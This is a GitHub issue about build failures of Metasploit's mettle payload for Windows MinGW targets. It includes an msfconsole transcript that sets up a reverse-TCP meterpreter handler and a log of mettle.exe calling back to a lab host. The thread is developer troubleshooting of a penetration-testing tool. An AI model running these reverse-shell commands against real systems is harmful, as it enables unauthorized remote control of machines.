Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Failing to build for Windows targets due to libcurl redefinition #208

Open
sempervictus opened this issue Mar 4, 2021 · 4 comments
Open

Failing to build for Windows targets due to libcurl redefinition #208

sempervictus opened this issue Mar 4, 2021 · 4 comments

Comments

@sempervictus
Copy link

Seeing this for i686 and x64:

configure: WARNING: the previous check could not be made default was used
Building curl for x86_64-w64-mingw32
/usr/lib/gcc/x86_64-w64-mingw32/10.2.0/../../../../x86_64-w64-mingw32/bin/ld: ../lib/.libs/libcurl.a(libcurl_la-system_win32.o):system_win32.c:(.bss+0x10): multiple definition of `Curl_freq'; curl-tool_doswin.o:tool_doswin.c:(.bss+0x8): first defined here
/usr/lib/gcc/x86_64-w64-mingw32/10.2.0/../../../../x86_64-w64-mingw32/bin/ld: ../lib/.libs/libcurl.a(libcurl_la-system_win32.o):system_win32.c:(.bss+0x8): multiple definition of `Curl_isVistaOrGreater'; curl-tool_doswin.o:tool_doswin.c:(.bss+0x0): first defined here
collect2: error: ld returned 1 exit status
make[4]: *** [Makefile:933: curl.exe] Error 1
make[3]: *** [Makefile:2000: install-recursive] Error 1
make[2]: *** [Makefile:949: install-recursive] Error 1
make[1]: *** [make/Makefile.curl:30: /.../mettle/build/x86_64-w64-mingw32/lib/libcurl.a] Error 2
make[1]: Leaving directory '/opt/code/Ruby/MSF/mettle'
make: *** [Makefile:33: x86_64-w64-mingw32.build] Error 2

Host system is Arch Linux, though that probably shouldn't have much bearing on this.
Ping @acammack-r7 and @OJ - any thoughts on what i broke this time? :)
@timwr
Copy link
Contributor

timwr commented Mar 5, 2021

It's building fine for me on Ubuntu 20.04, but the resulting binary doesn't seem to establish a session:

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
payload => windows/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.13.37
LHOST => 192.168.13.37
msf6 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) >
[*] Started reverse TCP handler on 192.168.13.37:4444

msf6 exploit(multi/handler) > [*] Meterpreter session 1 opened (192.168.13.37:4444 -> 192.168.13.105:49723) at 2021-03-05 12:16:46 +0000

msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information  Connection
  --  ----  ----                     -----------  ----------
  1         meterpreter x64/windows               192.168.13.37:4444 -> 192.168.13.105:49723 (192.168.13.105)

msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

meterpreter > load stdapi
Loading extension stdapi...
[-] Meterpreter session 1 is not valid and will be closed

[*] 192.168.13.105 - Meterpreter session 1 closed.
[*] Meterpreter session 2 opened (192.168.13.37:4444 -> 192.168.13.105:49725) at 2021-03-05 12:17:17 +0000

[-] Failed to load extension: No response was received to the core_enumextcmd request.
msf6 exploit(multi/handler) >


C:\>mettle.exe -u tcp://192.168.13.37:4444 -d 3
[03-05-2021 20:16:45.561s] [tlv.c:497] Registering command 10, cb 0000000000404ecd, arg 0000000000085bc0
[03-05-2021 20:16:45.561s] [tlv.c:497] Registering command 13, cb 0000000000404e7d, arg 0000000000085bc0
[03-05-2021 20:16:45.561s] [tlv.c:497] Registering command 22, cb 0000000000404e1c, arg 0000000000085bc0
[03-05-2021 20:16:45.579s] [tlv.c:497] Registering command 11, cb 0000000000404dd5, arg 0000000000085bc0
[03-05-2021 20:16:45.579s] [tlv.c:497] Registering command 21, cb 0000000000404d6f, arg 0000000000085bc0
[03-05-2021 20:16:45.579s] [tlv.c:497] Registering command 16, cb 0000000000404d30, arg 0000000000085bc0
[03-05-2021 20:16:45.579s] [tlv.c:497] Registering command 12, cb 0000000000404f86, arg 0000000000085bc0
[03-05-2021 20:16:45.611s] [tlv.c:497] Registering command 23, cb 0000000000404d3a, arg 0000000000085bc0
[03-05-2021 20:16:45.611s] [tlv.c:497] Registering command 4, cb 00000000004040e5, arg 0000000000085bc0
[03-05-2021 20:16:45.611s] [tlv.c:497] Registering command 2, cb 0000000000404aed, arg 0000000000085bc0
[03-05-2021 20:16:45.611s] [tlv.c:497] Registering command 6, cb 0000000000404a45, arg 0000000000085bc0
[03-05-2021 20:16:45.638s] [tlv.c:497] Registering command 7, cb 00000000004049b4, arg 0000000000085bc0
[03-05-2021 20:16:45.638s] [tlv.c:497] Registering command 5, cb 00000000004048b0, arg 0000000000085bc0
[03-05-2021 20:16:45.638s] [tlv.c:497] Registering command 8, cb 00000000004047d6, arg 0000000000085bc0
[03-05-2021 20:16:45.656s] [tlv.c:497] Registering command 1, cb 0000000000404769, arg 0000000000085bc0
[03-05-2021 20:16:45.656s] [tlv.c:497] Registering command 3, cb 0000000000404bd0, arg 0000000000085bc0
[03-05-2021 20:16:45.656s] [tlv.c:497] Registering command 1001, cb 000000000040c48e, arg 0000000000085bc0
[03-05-2021 20:16:45.656s] [tlv.c:497] Registering command 1004, cb 000000000040d18f, arg 0000000000085bc0
[03-05-2021 20:16:45.689s] [tlv.c:497] Registering command 1006, cb 000000000040d301, arg 0000000000085bc0
[03-05-2021 20:16:45.703s] [tlv.c:497] Registering command 1007, cb 000000000040d086, arg 0000000000085bc0
[03-05-2021 20:16:45.703s] [tlv.c:497] Registering command 1005, cb 000000000040a7ae, arg 0000000000085bc0
[03-05-2021 20:16:45.703s] [tlv.c:497] Registering command 1002, cb 000000000040c52e, arg 0000000000085bc0
[03-05-2021 20:16:45.703s] [tlv.c:497] Registering command 1008, cb 000000000040c4d3, arg 0000000000085bc0
[03-05-2021 20:16:45.703s] [tlv.c:497] Registering command 1011, cb 000000000040d1dc, arg 0000000000085bc0
[03-05-2021 20:16:45.703s] [tlv.c:497] Registering command 1003, cb 000000000040d0f5, arg 0000000000085bc0
[03-05-2021 20:16:45.736s] [tlv.c:497] Registering command 1009, cb 000000000040c42d, arg 0000000000085bc0
[03-05-2021 20:16:45.736s] [tlv.c:497] Registering command 1014, cb 000000000040a695, arg 0000000000085bc0
[03-05-2021 20:16:45.736s] [tlv.c:497] Registering command 1016, cb 000000000040d142, arg 0000000000085bc0
[03-05-2021 20:16:45.736s] [tlv.c:497] Registering command 1010, cb 000000000040a7cd, arg 0000000000085bc0
[03-05-2021 20:16:45.767s] [tlv.c:497] Registering command 1015, cb 000000000040a7ec, arg 0000000000085bc0
[03-05-2021 20:16:45.767s] [tlv.c:497] Registering command 1026, cb 000000000040ccf5, arg 0000000000085bc0
[03-05-2021 20:16:45.767s] [tlv.c:497] Registering command 1019, cb 000000000040adf4, arg 0000000000085bc0
[03-05-2021 20:16:45.767s] [tlv.c:497] Registering command 1022, cb 000000000040b109, arg 0000000000085bc0
[03-05-2021 20:16:45.798s] [tlv.c:497] Registering command 1017, cb 000000000040b2dd, arg 0000000000085bc0
[03-05-2021 20:16:45.798s] [tlv.c:497] Registering command 1023, cb 000000000040b301, arg 0000000000085bc0
[03-05-2021 20:16:45.798s] [tlv.c:497] Registering command 1018, cb 000000000040b14b, arg 0000000000085bc0
[03-05-2021 20:16:45.798s] [tlv.c:497] Registering command 1021, cb 000000000040b328, arg 0000000000085bc0
[03-05-2021 20:16:45.798s] [tlv.c:497] Registering command 1020, cb 000000000040a80b, arg 0000000000085bc0
[03-05-2021 20:16:45.829s] [tlv.c:497] Registering command 1024, cb 000000000040a82a, arg 0000000000085bc0
[03-05-2021 20:16:45.829s] [tlv.c:497] Registering command 1025, cb 000000000040d067, arg 0000000000085bc0
[03-05-2021 20:16:45.829s] [tlv.c:497] Registering command 1052, cb 000000000040bc26, arg 0000000000085bc0
[03-05-2021 20:16:45.829s] [tlv.c:497] Registering command 1055, cb 000000000040a680, arg 0000000000085bc0
[03-05-2021 20:16:45.861s] [tlv.c:497] Registering command 1059, cb 000000000040bd19, arg 0000000000085bc0
[03-05-2021 20:16:45.874s] [tlv.c:497] Registering command 1056, cb 000000000040a687, arg 0000000000085bc0
[03-05-2021 20:16:45.874s] [tlv.c:497] Registering command 1071, cb 000000000040bf7e, arg 0000000000085bc0
[03-05-2021 20:16:45.874s] [tlv.c:497] Registering command 1067, cb 000000000040a689, arg 0000000000085bc0
[03-05-2021 20:16:45.890s] [tlv.c:497] Registering command 1068, cb 000000000040ce68, arg 0000000000085bc0
[03-05-2021 20:16:45.890s] [tlv.c:497] Registering command 1069, cb 000000000040c0d8, arg 0000000000085bc0
[03-05-2021 20:16:45.890s] [tlv.c:497] Registering command 1077, cb 000000000040d283, arg 0000000000085bc0
[03-05-2021 20:16:45.890s] [tlv.c:497] Registering command 1071, cb 000000000040bf7e, arg 0000000000085bc0
[03-05-2021 20:16:45.890s] [tlv.c:497] Registering command 1072, cb 000000000040c056, arg 0000000000085bc0
[03-05-2021 20:16:45.924s] [tlv.c:497] Registering command 1070, cb 000000000040d230, arg 0000000000085bc0
[03-05-2021 20:16:45.937s] [tlv.c:497] Registering command 1095, cb 000000000040a693, arg 0000000000085bc0
[03-05-2021 20:16:45.947s] [mettle.c:75] Heartbeat
[03-05-2021 20:16:45.965s] [network_client.c:467] resolving 'tcp://192.168.13.37:4444'
[03-05-2021 20:16:45.965s] [network_client.c:345] connecting to tcp://192.168.13.37:4444
[03-05-2021 20:16:45.965s] [network_client.c:278] connected to 'tcp://192.168.13.37:4444'
[03-05-2021 20:16:46.325s] [tlv.c:524] handler for 16: 0000000002b70e00
[03-05-2021 20:16:46.325s] [tlv.c:565] processing command: 16 id: '50779909960228443000110991293709'
[03-05-2021 20:16:50.513s] [mettle.c:75] Heartbeat
[03-05-2021 20:16:55.512s] [mettle.c:75] Heartbeat
[03-05-2021 20:17:00.513s] [mettle.c:75] Heartbeat
[03-05-2021 20:17:05.513s] [mettle.c:75] Heartbeat
[03-05-2021 20:17:10.498s] [mettle.c:75] Heartbeat
[03-05-2021 20:17:13.778s] [tlv.c:524] handler for 10: 0000000002b70570
[03-05-2021 20:17:13.794s] [tlv.c:565] processing command: 10 id: '99689937435509362402246444782967'
[03-05-2021 20:17:15.512s] [mettle.c:75] Heartbeat
[03-05-2021 20:17:16.966s] [network_client.c:467] resolving 'tcp://192.168.13.37:4444'
[03-05-2021 20:17:16.986s] [network_client.c:345] connecting to tcp://192.168.13.37:4444
[03-05-2021 20:17:16.999s] [network_client.c:278] connected to 'tcp://192.168.13.37:4444'
[03-05-2021 20:17:17.262s] [tlv.c:524] handler for 16: 0000000002b70e00
[03-05-2021 20:17:17.279s] [tlv.c:565] processing command: 16 id: '95808409062909733036113808451481'
[03-05-2021 20:17:20.513s] [mettle.c:75] Heartbeat
[03-05-2021 20:17:25.513s] [mettle.c:75] Heartbeat
[03-05-2021 20:17:30.513s] [mettle.c:75] Heartbeat
[03-05-2021 20:17:35.513s] [mettle.c:75] Heartbeat
[03-05-2021 20:17:40.513s] [mettle.c:75] Heartbeat
[03-05-2021 20:17:45.512s] [mettle.c:75] Heartbeat
[03-05-2021 20:17:47.966s] [network_client.c:467] resolving 'tcp://192.168.13.37:4444'
[03-05-2021 20:17:47.986s] [network_client.c:345] connecting to tcp://192.168.13.37:4444
[03-05-2021 20:17:47.999s] [network_client.c:278] connected to 'tcp://192.168.13.37:4444'
[03-05-2021 20:17:48.278s] [tlv.c:524] handler for 16: 0000000002b70e00
[03-05-2021 20:17:48.278s] [tlv.c:565] processing command: 16 id: '56847072888345645143823264150498'
[03-05-2021 20:17:50.513s] [mettle.c:75] Heartbeat
[03-05-2021 20:17:55.512s] [mettle.c:75] Heartbeat
[03-05-2021 20:18:00.498s] [mettle.c:75] Heartbeat
[03-05-2021 20:18:05.513s] [mettle.c:75] Heartbeat
[03-05-2021 20:18:10.512s] [mettle.c:75] Heartbeat
[03-05-2021 20:18:15.512s] [mettle.c:75] Heartbeat
[03-05-2021 20:18:18.966s] [network_client.c:467] resolving 'tcp://192.168.13.37:4444'
[03-05-2021 20:18:19.001s] [network_client.c:345] connecting to tcp://192.168.13.37:4444
[03-05-2021 20:18:19.001s] [network_client.c:278] connected to 'tcp://192.168.13.37:4444'
[03-05-2021 20:18:19.278s] [tlv.c:524] handler for 16: 0000000002b70e00
[03-05-2021 20:18:19.278s] [tlv.c:565] processing command: 16 id: '48703818332960116459090654277147'
[03-05-2021 20:18:20.512s] [mettle.c:75] Heartbeat
[03-05-2021 20:18:25.512s] [mettle.c:75] Heartbeat
[03-05-2021 20:18:30.513s] [mettle.c:75] Heartbeat

@sempervictus
Copy link
Author

@timwr: Long time buddy, thanks for picking this up.
If we're seeing different errors on different OS, does this mean we've picked up build-system dependencies? MUSL stack was supposed to keep us immunized (i thought) from that sort of pollution.
I'll try building in an ubuntu nspawn and see what i get, but if we are getting deltas per-host, might be worthwhile to figure out where those interfaces are.

For your connection issue, can you instrument the MSF-side TLV handler to log-out? I'm curious what its getting from the Windows side to cause that. I saw stuff like that most recently with TLVCrypt testing for OJ, but would need to see what the Ruby side thinks of the TLVs (or bitgarbage) its getting from the final stage loaded

@acammack-r7
Copy link
Contributor

Yeah, the MinGW stuff was never really more than a PoC and it's not surprising we can't handle GCC 10. I think session type would need to be a Linux stageless meterp to get anything going. Windows native meterp behaves very differently from mingw mettle.

@acammack-r7
Copy link
Contributor

If you need to get it building and don't care about MinGW (Metasploit doesn't use those payloads anywhere), you can remove those triples from the ARCHES file to no ill effect (it's what I do). The way Debian/Ubuntu does their mingw packaging is quite different to Arch, and I've had plenty of issues around that in the past.

@zeroSteiner zeroSteiner mentioned this issue Mar 8, 2023
Open
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@timwr @sempervictus @acammack-r7